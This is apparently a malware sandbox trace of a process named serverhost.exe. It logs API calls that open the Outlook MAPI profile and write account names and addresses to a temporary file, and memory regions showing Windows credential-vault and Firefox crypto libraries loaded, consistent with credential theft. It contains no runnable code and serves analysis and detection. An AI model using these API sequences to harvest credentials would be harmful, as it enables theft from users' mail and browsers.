SetLastError (dwErrCode=0x0) [0085.496] GetLastError () returned 0x0 [0085.496] SetLastError (dwErrCode=0x0) [0085.496] GetLastError () returned 0x0 [0085.496] SetLastError (dwErrCode=0x0) [0085.496] GetLastError () returned 0x0 [0085.496] SetLastError (dwErrCode=0x0) [0085.496] GetLastError () returned 0x0 [0085.496] SetLastError (dwErrCode=0x0) [0085.496] GetLastError () returned 0x0 [0085.496] SetLastError (dwErrCode=0x0) [0085.496] GetLastError () returned 0x0 [0085.496] SetLastError (dwErrCode=0x0) [0085.496] GetLastError () returned 0x0 [0085.496] SetLastError (dwErrCode=0x0) [0085.496] GetLastError () returned 0x0 [0085.496] SetLastError (dwErrCode=0x0) [0085.496] GetLastError () returned 0x0 [0085.496] SetLastError (dwErrCode=0x0) [0085.497] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x764f0000 [0085.504] LoadLibraryW (lpLibFileName="ole32.dll") returned 0x77140000 [0085.548] LoadLibraryW (lpLibFileName="shell32.dll") returned 0x758a0000 [0085.553] GetCommandLineW () returned="\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\" \"C:\\ProgramData\\C572.tmp\"" [0085.553] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\" \"C:\\ProgramData\\C572.tmp\"", pNumArgs=0x16f9c4 | out: pNumArgs=0x16f9c4) returned 0x313fa8*="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe" [0085.553] RegCreateKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Clients\\Mail\\Microsoft Outlook", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x1, lpSecurityAttributes=0x0, phkResult=0x16f9ac, lpdwDisposition=0x0 | out: phkResult=0x16f9ac*=0x74, lpdwDisposition=0x0) returned 0x0 [0085.553] RegQueryValueExW (in: hKey=0x74, lpValueName="DLLPathEx", lpReserved=0x0, lpType=0x0, lpData=0x16f510, lpcbData=0x16f990*=0x104 | out: lpType=0x0, lpData=0x16f510*=0x43, lpcbData=0x16f990*=0x56) returned 0x0 [0085.553] RegQueryValueExW (in: hKey=0x74, lpValueName="MSIApplicationLCID", lpReserved=0x0, lpType=0x0, lpData=0x16f718, lpcbData=0x16f998*=0x104 | out: lpType=0x0, lpData=0x16f718*=0x4d, lpcbData=0x16f998*=0x5c) returned 0x0 [0085.553] RegCloseKey (hKey=0x74) returned 0x0 [0085.553] LoadLibraryW (lpLibFileName="C:\\PROGRA~1\\MICROS~1\\Office15\\OLMAPI32.DLL") returned 0x63430000 [0086.282] CreateFileW (lpFileName="C:\\ProgramData\\C572.tmp" (normalized: "c:\\programdata\\c572.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb4 [0086.282] lstrlenW (lpString="Microsoft\\Office\\15.0\\Outlook") returned 29 [0086.282] WriteFile (in: hFile=0xb4, lpBuffer=0x16f718*, nNumberOfBytesToWrite=0x3a, lpNumberOfBytesWritten=0x16f938, lpOverlapped=0x0 | out: lpBuffer=0x16f718*, lpNumberOfBytesWritten=0x16f938*=0x3a, lpOverlapped=0x0) returned 1 [0086.283] MAPIInitialize (lpMapiInit=0x0) returned 0x0 [0086.443] MAPIAdminProfiles (in: ulFlags=0x0, lppProfAdmin=0x16f980 | out: lppProfAdmin=0x16f980) returned 0x0 [0086.445] MAPILogonEx (in: ulUIParam=0x0, lpszProfileName="Outlook", lpszPassword=0x0, flFlags=0x8022, lppSession=0x16f9a4 | out: lppSession=0x16f9a4) returned 0x0 [0086.580] GetTickCount () returned 0x1d1fd [0086.583] GetTickCount () returned 0x1d1fd [0086.584] _MsoFWzEqual@12 () returned 0x0 [0086.589] CoCreateInstance (in: rclsid=0x405400*(Data1=0xed475410, Data2=0xb0d6, Data3=0x11d2, Data4=([0]=0x8c, [1]=0x3b, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0x2a, [6]=0x66, [7]=0x76)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x4053e0*(Data1=0x9240a6cd, Data2=0xaf41, Data3=0x11d2, Data4=([0]=0x8c, [1]=0x3b, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0x2a, [6]=0x66, [7]=0x76)), ppv=0x16f9a8 | out: ppv=0x16f9a8*=0x2d60af0) returned 0x0 [0086.593] lstrlenA (lpString="Outlook") returned 7 [0086.593] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x351498, cbMultiByte=-1, lpWideCharStr=0x378e28, cchWideChar=8 | out: lpWideCharStr="Outlook") returned 8 [0086.593] lstrcpyW (in: lpString1=0x16f0d0, lpString2="Outlook" | out: lpString1="Outlook") returned="Outlook" [0086.597] lstrcpyW (in: lpString1=0x16edd0, lpString2="Outlook" | out: lpString1="Outlook") returned="Outlook" [0086.598] lstrlenW (lpString="sadcno@dfdj.frg") returned 15 [0086.598] lstrcpyW (in: lpString1=0xacf7f0, lpString2="sadcno@dfdj.frg" | out: lpString1="sadcno@dfdj.frg") returned="sadcno@dfdj.frg" [0086.598] lstrlenW (lpString="cvujejck") returned 8 [0086.598] lstrcpyW (in: lpString1=0xacf818, lpString2="cvujejck" | out: lpString1="cvujejck") returned="cvujejck" [0086.598] IUnknown:Release (This=0x2d60af0) returned 0x0 [0086.972] MAPIFreeBuffer (lpBuffer=0x379130) returned 0x0 [0086.972] MAPIFreeBuffer (lpBuffer=0x379160) returned 0x0 [0086.973] MAPIFreeBuffer (lpBuffer=0x3791d8) returned 0x0 [0086.974] MAPIFreeBuffer (lpBuffer=0x379208) returned 0x0 [0086.974] MAPIFreeBuffer (lpBuffer=0x379250) returned 0x0 [0086.975] MAPIFreeBuffer (lpBuffer=0x379280) returned 0x0 [0086.975] MAPIFreeBuffer (lpBuffer=0x3792c8) returned 0x0 [0086.976] MAPIFreeBuffer (lpBuffer=0x3792f8) returned 0x0 [0086.977] MAPIFreeBuffer (lpBuffer=0x379340) returned 0x0 [0086.977] MAPIFreeBuffer (lpBuffer=0x3a4a60) returned 0x0 [0086.978] MAPIFreeBuffer (lpBuffer=0x3a4ac0) returned 0x0 [0086.979] MAPIFreeBuffer (lpBuffer=0x3a4af0) returned 0x0 [0086.979] MAPIFreeBuffer (lpBuffer=0x3a4b38) returned 0x0 [0086.980] MAPIFreeBuffer (lpBuffer=0x3a4b68) returned 0x0 [0086.981] MAPIFreeBuffer (lpBuffer=0x3a4bb0) returned 0x0 [0086.981] MAPIFreeBuffer (lpBuffer=0x3a4be0) returned 0x0 [0086.982] MAPIFreeBuffer (lpBuffer=0x3a4c28) returned 0x0 [0086.983] MAPIFreeBuffer (lpBuffer=0x3a4c58) returned 0x0 [0086.983] MAPIFreeBuffer (lpBuffer=0x3a4ca0) returned 0x0 [0086.984] MAPIFreeBuffer (lpBuffer=0x3a4cd0) returned 0x0 [0086.984] MAPIFreeBuffer (lpBuffer=0x3a4d18) returned 0x0 [0086.985] MAPIFreeBuffer (lpBuffer=0x3a4d48) returned 0x0 [0086.985] MAPIFreeBuffer (lpBuffer=0x3a4d90) returned 0x0 [0086.986] MAPIFreeBuffer (lpBuffer=0x3a4dc0) returned 0x0 [0086.986] MAPIFreeBuffer (lpBuffer=0x3a4e08) returned 0x0 [0086.987] MAPIFreeBuffer (lpBuffer=0x3a4e38) returned 0x0 [0086.988] MAPIFreeBuffer (lpBuffer=0x3a4e80) returned 0x0 [0086.988] MAPIFreeBuffer (lpBuffer=0x3a4eb0) returned 0x0 [0086.988] MAPIFreeBuffer (lpBuffer=0x3970f0) returned 0x0 [0086.988] MAPIFreeBuffer (lpBuffer=0x365178) returned 0x0 [0086.988] MAPIFreeBuffer (lpBuffer=0x3651d0) returned 0x0 [0086.988] MAPIFreeBuffer (lpBuffer=0x388dd0) returned 0x0 [0086.988] MAPIFreeBuffer (lpBuffer=0x388e30) returned 0x0 [0086.988] MAPIFreeBuffer (lpBuffer=0x388e90) returned 0x0 [0086.988] MAPIFreeBuffer (lpBuffer=0x365228) returned 0x0 [0086.988] MAPIFreeBuffer (lpBuffer=0x365280) returned 0x0 [0086.988] MAPIFreeBuffer (lpBuffer=0x3652d8) returned 0x0 [0086.988] MAPIFreeBuffer (lpBuffer=0x365330) returned 0x0 [0086.988] MAPIFreeBuffer (lpBuffer=0x388ef0) returned 0x0 [0086.988] MAPIFreeBuffer (lpBuffer=0x399820) returned 0x0 [0086.988] MAPIFreeBuffer (lpBuffer=0x359898) returned 0x0 [0086.988] MAPIFreeBuffer (lpBuffer=0x388f50) returned 0x0 [0086.988] MAPIFreeBuffer (lpBuffer=0x399118) returned 0x0 [0086.989] MAPIFreeBuffer (lpBuffer=0x35adc8) returned 0x0 [0087.084] MAPIFreeBuffer (lpBuffer=0x37c720) returned 0x0 [0087.084] MAPIFreeBuffer (lpBuffer=0x35ad68) returned 0x0 [0087.084] MAPIFreeBuffer (lpBuffer=0x351488) returned 0x0 [0087.084] MAPIFreeBuffer (lpBuffer=0x34e230) returned 0x0 [0087.084] MAPIUninitialize () [0087.312] _snwprintf (in: _Dest=0x16f2f0, _Count=0x104, _Format="\r\n%s<%s>" | out: _Dest="\r\ncvujejck") returned 27 [0087.312] WriteFile (in: hFile=0xb4, lpBuffer=0x16f2f0*, nNumberOfBytesToWrite=0x36, lpNumberOfBytesWritten=0x16f4f8, lpOverlapped=0x0 | out: lpBuffer=0x16f2f0*, lpNumberOfBytesWritten=0x16f4f8*=0x36, lpOverlapped=0x0) returned 1 [0087.312] CloseHandle (hObject=0xb4) returned 1 [0087.312] HeapDestroy (hHeap=0xa50000) returned 1 [0087.314] FreeLibrary (hLibModule=0x63430000) returned 1 [0087.341] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x16f96c | out: phModule=0x16f96c) returned 0 [0087.341] ExitProcess (uExitCode=0x0) Thread: id = 94 os_tid = 0xc8c Thread: id = 95 os_tid = 0xc90 Thread: id = 96 os_tid = 0xc94 Thread: id = 97 os_tid = 0xc98 Thread: id = 98 os_tid = 0xc9c Thread: id = 99 os_tid = 0xca8 Thread: id = 100 os_tid = 0xcac Thread: id = 101 os_tid = 0xcb0 Process: id = "14" image_name = "serverhost.exe" filename = "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe" page_root = "0x7eef7720" os_pid = "0xc64" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0xc18" cmd_line = "\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\" /scomma \"C:\\ProgramData\\C571.tmp\"" cur_dir = "C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fcb0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1916 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1917 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1918 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 1919 start_va = 0x400000 end_va = 0x45afff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1920 start_va = 0xc40000 end_va = 0xc5afff entry_point = 0xc41d90 region_type = mapped_file name = "serverhost.exemh.exe" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exeMh.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exemh.exe") Region: id = 1921 start_va = 0x772a0000 end_va = 0x773dbfff entry_point = 0x772a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1922 start_va = 0x774e0000 end_va = 0x774e0fff entry_point = 0x774e0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1923 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1924 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 1925 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1926 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1927 start_va = 0x40000 end_va = 0xa6fff entry_point = 0x40000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1928 start_va = 0xb0000 end_va = 0x177fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 1929 start_va = 0x3e0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 1930 start_va = 0x570000 end_va = 0x66ffff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1931 start_va = 0x6eb50000 end_va = 0x6ebd3fff entry_point = 0x6eb519a9 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 1932 start_va = 0x74940000 end_va = 0x74948fff entry_point = 0x74941220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1933 start_va = 0x75460000 end_va = 0x7546bfff entry_point = 0x7546238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1934 start_va = 0x75470000 end_va = 0x754b9fff entry_point = 0x75477de0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1935 start_va = 0x755b0000 end_va = 0x756ccfff entry_point = 0x755b158a region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1936 start_va = 0x756f0000 end_va = 0x75708fff entry_point = 0x756f4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1937 start_va = 0x75710000 end_va = 0x757b0fff entry_point = 0x75742433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1938 start_va = 0x758a0000 end_va = 0x764e9fff entry_point = 0x75921601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1939 start_va = 0x764f0000 end_va = 0x7658ffff entry_point = 0x765049e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1940 start_va = 0x76590000 end_va = 0x76663fff entry_point = 0x765dbde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1941 start_va = 0x76670000 end_va = 0x766eafff entry_point = 0x76671aee region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\System32\\comdlg32.dll" (normalized: "c:\\windows\\system32\\comdlg32.dll") Region: id = 1942 start_va = 0x76780000 end_va = 0x7682bfff entry_point = 0x7678a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1943 start_va = 0x76830000 end_va = 0x76839fff entry_point = 0x7683136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1944 start_va = 0x76840000 end_va = 0x7688dfff entry_point = 0x76849c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1945 start_va = 0x76890000 end_va = 0x76958fff entry_point = 0x768ad711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1946 start_va = 0x76b40000 end_va = 0x76b96fff entry_point = 0x76b59ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1947 start_va = 0x76ba0000 end_va = 0x76c2efff entry_point = 0x76ba3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1948 start_va = 0x76c60000 end_va = 0x76e5afff entry_point = 0x76c622d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 1949 start_va = 0x76e60000 end_va = 0x76efcfff entry_point = 0x76e93fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1950 start_va = 0x76f00000 end_va = 0x77035fff entry_point = 0x76f01b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 1951 start_va = 0x77040000 end_va = 0x77134fff entry_point = 0x77041865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 1952 start_va = 0x77140000 end_va = 0x7729bfff entry_point = 0x7718ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1953 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1954 start_va = 0x757c0000 end_va = 0x7588bfff entry_point = 0x757c168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1955 start_va = 0x77400000 end_va = 0x7741efff entry_point = 0x77401355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1959 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1960 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 1961 start_va = 0x290000 end_va = 0x390fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 1962 start_va = 0x520000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 1963 start_va = 0xc60000 end_va = 0x185ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c60000" filename = "" Region: id = 1966 start_va = 0x670000 end_va = 0x76ffff entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 1967 start_va = 0x3a0000 end_va = 0x3a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1970 start_va = 0x770000 end_va = 0xa3efff entry_point = 0x770000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1975 start_va = 0x74e70000 end_va = 0x74e85fff entry_point = 0x74e72dc3 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1976 start_va = 0x460000 end_va = 0x49bfff entry_point = 0x46128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1977 start_va = 0x460000 end_va = 0x49bfff entry_point = 0x46128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1978 start_va = 0x460000 end_va = 0x49bfff entry_point = 0x46128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1979 start_va = 0x460000 end_va = 0x49bfff entry_point = 0x46128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1980 start_va = 0x460000 end_va = 0x49bfff entry_point = 0x46128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1981 start_va = 0x74c20000 end_va = 0x74c5afff entry_point = 0x74c2128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1982 start_va = 0x75340000 end_va = 0x7534bfff entry_point = 0x753410e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1985 start_va = 0xa60000 end_va = 0xb5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a60000" filename = "" Region: id = 1986 start_va = 0x71ec0000 end_va = 0x71eccfff entry_point = 0x71ec5b1d region_type = mapped_file name = "pstorec.dll" filename = "\\Windows\\System32\\pstorec.dll" (normalized: "c:\\windows\\system32\\pstorec.dll") Region: id = 1987 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1988 start_va = 0x741c0000 end_va = 0x741d3fff entry_point = 0x741c1da9 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 1989 start_va = 0x6f4d0000 end_va = 0x6f4dbfff entry_point = 0x6f4d0000 region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\System32\\vaultcli.dll" (normalized: "c:\\windows\\system32\\vaultcli.dll") Region: id = 2089 start_va = 0x1860000 end_va = 0x1960fff entry_point = 0x0 region_type = private name = "private_0x0000000001860000" filename = "" Region: id = 2090 start_va = 0x1860000 end_va = 0x1960fff entry_point = 0x0 region_type = private name = "private_0x0000000001860000" filename = "" Region: id = 2091 start_va = 0x1860000 end_va = 0x1960fff entry_point = 0x0 region_type = private name = "private_0x0000000001860000" filename = "" Region: id = 2092 start_va = 0x1860000 end_va = 0x1960fff entry_point = 0x0 region_type = private name = "private_0x0000000001860000" filename = "" Region: id = 2093 start_va = 0x1860000 end_va = 0x1a11fff entry_point = 0x1860000 region_type = mapped_file name = "nss3.dll" filename = "\\Program Files\\Mozilla Firefox\\nss3.dll" (normalized: "c:\\program files\\mozilla firefox\\nss3.dll") Region: id = 2094 start_va = 0x1860000 end_va = 0x1a11fff entry_point = 0x19c2823 region_type = mapped_file name = "nss3.dll" filename = "\\Program Files\\Mozilla Firefox\\nss3.dll" (normalized: "c:\\program files\\mozilla firefox\\nss3.dll") Region: id = 2095 start_va = 0x63270000 end_va = 0x63424fff entry_point = 0x633d2823 region_type = mapped_file name = "nss3.dll" filename = "\\Program Files\\Mozilla Firefox\\nss3.dll" (normalized: "c:\\program files\\mozilla firefox\\nss3.dll") Region: id = 2097 start_va = 0x6e620000 end_va = 0x6e651fff entry_point = 0x6e6237f1 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 2098 start_va = 0x6f310000 end_va = 0x6f316fff entry_point = 0x6f310000 region_type = mapped_file name = "wsock32.dll" filename = "\\Windows\\System32\\wsock32.dll" (normalized: "c:\\windows\\system32\\wsock32.dll") Region: id = 2099 start_va = 0x76960000 end_va = 0x76994fff entry_point = 0x7696145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2100 start_va = 0x773e0000 end_va = 0x773e5fff entry_point = 0x773e1782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2101 start_va = 0x6d490000 end_va = 0x6d54dfff entry_point = 0x6d490000 region_type = mapped_file name = "msvcr100.dll" filename = "\\Program Files\\Mozilla Firefox\\msvcr100.dll" (normalized: "c:\\program files\\mozilla firefox\\msvcr100.dll") Region: id = 2102 start_va = 0x6f2e0000 end_va = 0x6f301fff entry_point = 0x6f2e0000 region_type = mapped_file name = "mozglue.dll" filename = "\\Program Files\\Mozilla Firefox\\mozglue.dll" (normalized: "c:\\program files\\mozilla firefox\\mozglue.dll") Region: id = 2103 start_va = 0x6f270000 end_va = 0x6f2d8fff entry_point = 0x6f270000 region_type = mapped_file name = "msvcp100.dll" filename = "\\Program Files\\Mozilla Firefox\\msvcp100.dll" (normalized: "c:\\program files\\mozilla firefox\\msvcp100.dll") Region: id = 2104 start_va = 0xb60000 end_va = 0xc3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 2109 start_va = 0x1860000 end_va = 0x197ffff entry_point = 0x0 region_type = private name = "private_0x0000000001860000" filename = "" Region: id = 2114 start_va = 0x1860000 end_va = 0x195ffff entry_point = 0x0 region_type = private name = "private_0x0000000001860000" filename = "" Region: id = 2115 start_va = 0x1970000 end_va = 0x197ffff entry_point = 0x0 region_type = private name = "private_0x0000000001970000" filename = "" Region: id = 2124 start_va = 0x1980000 end_va = 0x1a7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001980000" filename = "" Region: id = 2125 start_va = 0x1a00000 end_va = 0x1afffff entry_point = 0x0 region_type = private name = "private_0x0000000001a00000" filename = "" Region: id = 2126 start_va = 0x6f450000 end_va = 0x6f476fff entry_point = 0x6f450000 region_type = mapped_file name = "softokn3.dll" filename = "\\Program Files\\Mozilla Firefox\\softokn3.dll" (normalized: "c:\\program files\\mozilla firefox\\softokn3.dll") Region: id = 2127 start_va = 0x6f430000 end_va = 0x6f446fff entry_point = 0x6f430000 region_type = mapped_file name = "nssdbm3.dll" filename = "\\Program Files\\Mozilla Firefox\\nssdbm3.dll" (normalized: "c:\\program files\\mozilla firefox\\nssdbm3.dll") Region: id = 2128 start_va = 0x3b0000 end_va = 0x3b0fff entry_point = 0x3b0000 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 2129 start_va = 0x3c0000 end_va = 0x3c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 2130 start_va = 0x3d0000 end_va = 0x3d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 2131 start_va = 0x1b00000 end_va = 0x1ef2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b00000" filename = "" Region: id = 2132 start_va = 0x3b0000 end_va = 0x3b0fff entry_point = 0x3b0000 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 2133 start_va = 0x6f3e0000 end_va = 0x6f42efff entry_point = 0x6f3e0000 region_type = mapped_file name = "freebl3.dll" filename = "\\Program Files\\Mozilla Firefox\\freebl3.dll" (normalized: "c:\\program files\\mozilla firefox\\freebl3.dll") Region: id = 2134 start_va = 0x6f420000 end_va = 0x6f446fff entry_point = 0x6f43c589 region_type = mapped_file name = "softokn3.dll" filename = "\\Program Files\\Mozilla Firefox\\softokn3.dll" (normalized: "c:\\program files\\mozilla firefox\\softokn3.dll") Region: id = 2135 start_va = 0x6f460000 end_va = 0x6f476fff entry_point = 0x6f471aa0 region_type = mapped_file name = "nssdbm3.dll" filename = "\\Program Files\\Mozilla Firefox\\nssdbm3.dll" (normalized: "c:\\program 